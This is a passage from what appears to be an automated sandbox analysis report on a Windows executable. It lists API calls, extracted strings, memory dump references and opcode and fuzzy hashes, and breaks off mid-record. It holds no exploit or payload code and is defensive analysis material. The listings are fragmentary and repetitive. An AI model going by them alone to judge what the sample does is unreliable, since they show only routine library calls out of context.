                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindHandleModuleResource
                                                                                          • String ID: LTR$RTL
                                                                                          • API String ID: 3537982541-719208805
                                                                                          • Opcode ID: 0bc84e5add55507c0e8ba6d23f1fd242c957ff5057c7d12a9af67ab9cce86963
                                                                                          • Instruction ID: fa63246a47c2d0127f2cef311b37ac4f3eb3c4e55fb98fcff0c5969748a2b223
                                                                                          • Opcode Fuzzy Hash: 0bc84e5add55507c0e8ba6d23f1fd242c957ff5057c7d12a9af67ab9cce86963
                                                                                          • Instruction Fuzzy Hash: 80F0243161435867E7296679AC0AFB73BACE782B00F0042ADF60AC61C1DFA59D4887B4
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003C7F55,?,?,?), ref: 003C9FD0
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003C7F55,?,?), ref: 003CA014
                                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003C7F55,?,?,?,?,?,?,?,?), ref: 003CA095
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,?,003C7F55,?,?,?,?,?,?,?,?,?,?,?), ref: 003CA09C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 2287278272-0
                                                                                          • Opcode ID: 273b9736ef0b7cdacb5be01b67ed323cfd67c280027c16711afc28bfc83a8ad8
                                                                                          • Instruction ID: cae13af77d3910d89a0a27b8c0edd383370b4b505218b42076aa0bc41b8baa91
                                                                                          • Opcode Fuzzy Hash: 273b9736ef0b7cdacb5be01b67ed323cfd67c280027c16711afc28bfc83a8ad8
                                                                                          • Instruction Fuzzy Hash: 6441DD31248385AAE732DF24DC05FEABBE8AB81744F05091DF5D4D71C1DA649E08CB53
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,003E2794,00000000,00000000,003E2FC2,?,003E2FC2,?,00000001,003E2794,F5E85006,00000001,003E2FC2,003E2FC2), ref: 003E9440
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003E94C9
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003E94DB
                                                                                          • __freea.LIBCMT ref: 003E94E4
                                                                                            • Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 9bab4e7d90d573ffab7a6f2b3b190ba5e4d806769f86c6c72988a190549d0f3a
                                                                                          • Instruction ID: 8d6747f438bf463369d129e8d86ef5aca3edb48c1725a6307c16be1c464bebf6
                                                                                          • Opcode Fuzzy Hash: 9bab4e7d90d573ffab7a6f2b3b190ba5e4d806769f86c6c72988a190549d0f3a
                                                                                          • Instruction Fuzzy Hash: BD31C072A0026AAFDB26CF66DC45EAE7BA9EB40310F054229FC04DA2D1E735CD51CB90
                                                                                          APIs
                                                                                          • LoadBitmapW.USER32(00000065), ref: 003D9A86
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 003D9AA7
                                                                                          • DeleteObject.GDI32(00000000), ref: 003D9ACF
                                                                                          • DeleteObject.GDI32(00000000), ref: 003D9AEE
                                                                                            • Part of subcall function 003D8BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,003D9AC8,00000066), ref: 003D8BE1
                                                                                            • Part of subcall function 003D8BD0: SizeofResource.KERNEL32(00000000,75FD5780,?,?,003D9AC8,00000066), ref: 003D8BF9
                                                                                            • Part of subcall function 003D8BD0: LoadResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C0C
                                                                                            • Part of subcall function 003D8BD0: LockResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                          • String ID:
                                                                                          • API String ID: 142272564-0
                                                                                          • Opcode ID: 93a5530b8f7c2cf914f614507a5fdfa8ef2095bcbaa7166761b9b2c8b449dac3
                                                                                          • Instruction ID: e1126c05e0600e3773eba272b649a08a8065d36a31ac4522cf03943bf8bef2aa
                                                                                          • Opcode Fuzzy Hash: 93a5530b8f7c2cf914f614507a5fdfa8ef2095bcbaa7166761b9b2c8b449dac3
                                                                                          • Instruction Fuzzy Hash: 1001DF3364061437C6136778BD42FBBB6AEEF85B51F090013BD04AB391EE219C1582A1
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 003E1020
                                                                                            • Part of subcall function 003E1658: ___AdjustPointer.LIBCMT ref: 003E16A2
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 003E1037
                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 003E1049
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 003E106D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                          • String ID:
                                                                                          • API String ID: 2633735394-0
                                                                                          • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                          • Instruction ID: 74215a3f093599bc446b8a888d2490e8c523719ba9bc4900c79e69de03fae084
                                                                                          • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                          • Instruction Fuzzy Hash: 5D012932000198FBCF236F56DC41EDA7BBAFF48754F054215F91869160C372E8A1DBA0
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 003E0B66
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 003E0B6B
                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 003E0B70
                                                                                            • Part of subcall function 003E1C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 003E1C1F
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 003E0B85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                          • Instruction ID: 6c5d4edab18ee9efc53f4cec2fd316ea302b19dcb22cc9cd7f713bdd3e1ce3d4
                                                                                          • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                          • Instruction Fuzzy Hash: 3FC04C741442F2541C2B3AB325021AD03542C627D9BA513C5F8925F5D39AB6848A6176
                                                                                          APIs
                                                                                            • Part of subcall function 003D8BA5: GetDC.USER32(00000000), ref: 003D8BA9
                                                                                            • Part of subcall function 003D8BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 003D8BB4
                                                                                            • Part of subcall function 003D8BA5: ReleaseDC.USER32(00000000,00000000), ref: 003D8BBF
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 003D8D24
                                                                                            • Part of subcall function 003D8EEA: GetDC.USER32(00000000), ref: 003D8EF3
                                                                                            • Part of subcall function 003D8EEA: GetObjectW.GDI32(?,00000018,?), ref: 003D8F22
                                                                                            • Part of subcall function 003D8EEA: ReleaseDC.USER32(00000000,?), ref: 003D8FB6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                          • String ID: (
                                                                                          • API String ID: 1061551593-3887548279
                                                                                          • Opcode ID: d3728327a11d22e7f5cb9150320dd4e008b32b97dba4c83681b332d7162a498d
                                                                                          • Instruction ID: fe79eb8ae59f5ae2d39b08866658b7448013f045e759cca3257fc389c040a6bf
                                                                                          • Opcode Fuzzy Hash: d3728327a11d22e7f5cb9150320dd4e008b32b97dba4c83681b332d7162a498d
                                                                                          • Instruction Fuzzy Hash: 5561F6B2204205AFD211DF64D884E6BBBEDFF89704F10495EF599CB260DB71E905CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _swprintf
                                                                                          • String ID: %ls$%s: %s
                                                                                          • API String ID: 589789837-2259941744
                                                                                          • Opcode ID: fd8e908ceeae57896b56506ac9825458db779cb1fc999d5036b395df2ccac5bf
                                                                                          • Instruction ID: a05455fa310786cb56d73132de264ca9b89a36bfcc0dd4899909726a957d90bd
                                                                                          • Opcode Fuzzy Hash: fd8e908ceeae57896b56506ac9825458db779cb1fc999d5036b395df2ccac5bf
                                                                                          • Instruction Fuzzy Hash: 8851FB3714D300F6EA2B1AD5BC4EF39766DAB05F00F60CC1BF38668AE6C5D198506B06
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 003E7D54
                                                                                            • Part of subcall function 003E5D2D: IsProcessorFeaturePresent.KERNEL32(00000017,003E5D1C,0000002C,003F80D0,003E8D71,00000000,00000000,003E63A2,?,?,003E5D29,00000000,00000000,00000000,00000000,00000000), ref: 003E5D2F
                                                                                            • Part of subcall function 003E5D2D: GetCurrentProcess.KERNEL32(C0000417,003F80D0,0000002C,003E5A5A,00000016,003E63A2), ref: 003E5D51
                                                                                            • Part of subcall function 003E5D2D: TerminateProcess.KERNEL32(00000000), ref: 003E5D58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                          • String ID: *?$.
                                                                                          • API String ID: 2667617558-3972193922
                                                                                          • Opcode ID: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
                                                                                          • Instruction ID: 4a8b14c566a22a4014a4ada43a662a86b7a13a36bd0ef5038770efcc99a2ba65
                                                                                          • Opcode Fuzzy Hash: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
                                                                                          • Instruction Fuzzy Hash: A051C371E04269AFCF16DFA9CC81ABEB7B9FF58310F254269E454E7381E6319E018B50
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C761E
                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C7799
                                                                                            • Part of subcall function 003CA0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA0D7
                                                                                            • Part of subcall function 003CA0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA108
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Attributes$H_prologTime
                                                                                          • String ID: :
                                                                                          • API String ID: 1861295151-336475711
                                                                                          • Opcode ID: e587fc6ceebff28b6bfa25abec70be2a02cd892ff07c3d472f7c66ba4f6aaacd
                                                                                          • Instruction ID: 54c0be9f9f14b97b28f5f5b7978807d44f20558b2d2b838ff0f338eb09cd10ad
                                                                                          • Opcode Fuzzy Hash: e587fc6ceebff28b6bfa25abec70be2a02cd892ff07c3d472f7c66ba4f6aaacd
                                                                                          • Instruction Fuzzy Hash: 4A419C7180465CAADB26EB64DC49FEE737CAF45340F0040AEBA45EA082DB745F85CF61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: UNC$\\?\
                                                                                          • API String ID: 0-253988292
                                                                                          • Opcode ID: ba018b5f35ba4863d33abec15e4638a8f3281ccad015f2141543c14e1fbaaecc
                                                                                          • Instruction ID: 322bd8f742b3d2e88c3a649c586fbbf919d26b32619f342b75a392217c271e45
                                                                                          • Opcode Fuzzy Hash: ba018b5f35ba4863d33abec15e4638a8f3281ccad015f2141543c14e1fbaaecc
                                                                                          • Instruction Fuzzy Hash: 12417E35404299ABCB23AF62DC42FEEB76AEF01350F15456AF854D6142E770DD90CBA0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Shell.Explorer$about:blank
                                                                                          • API String ID: 0-874089819
                                                                                          • Opcode ID: c9651cf37fd4be0b6e46c3c6cf580d719ebc5515150dc957fc61b0adb589d9bf
                                                                                          • Instruction ID: 507c532947bf3407bbe2d7fee787db3d7774457a5bca0f2bd5999bf5868b54b0
                                                                                          • Opcode Fuzzy Hash: c9651cf37fd4be0b6e46c3c6cf580d719ebc5515150dc957fc61b0adb589d9bf
                                                                                          • Instruction Fuzzy Hash: BB218B76210606BFD3069F64E890E36B76CBF84710B15852BF2058B782CF61FC44CBA0
                                                                                          APIs
                                                                                            • Part of subcall function 003CDEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003CDED4
                                                                                            • Part of subcall function 003CDEB5: GetProcAddress.KERNEL32(00401E58,CryptUnprotectMemory), ref: 003CDEE4
                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,003CDF2E), ref: 003CDFB5
                                                                                          Strings
                                                                                          • CryptProtectMemory failed, xrefs: 003CDF75
                                                                                          • CryptUnprotectMemory failed, xrefs: 003CDFAD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                          • API String ID: 2190909847-396321323
                                                                                          • Opcode ID: 976d722bb1117c7ef01ae678637614cb09757b29a5ec793d27e200b381133c76
                                                                                          • Instruction ID: 5564b7196fc28db0f140b5d00bcb7e9dd83b1012108897ac5ab6a61cc7c172cb
                                                                                          • Opcode Fuzzy Hash: 976d722bb1117c7ef01ae678637614cb09757b29a5ec793d27e200b381133c76
                                                                                          • Instruction Fuzzy Hash: B211EF7130821A6BEB179B39DC41F6E7399BF84B50B06803EF903DA192DB70EC008390
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003DBC7D
                                                                                            • Part of subcall function 003C7B10: __EH_prolog.LIBCMT ref: 003C7B15
                                                                                            • Part of subcall function 003C7B10: new.LIBCMT ref: 003C7B56
                                                                                          Strings
                                                                                          • 0b@, xrefs: 003DBCC5
                                                                                          • C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, xrefs: 003DBCB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
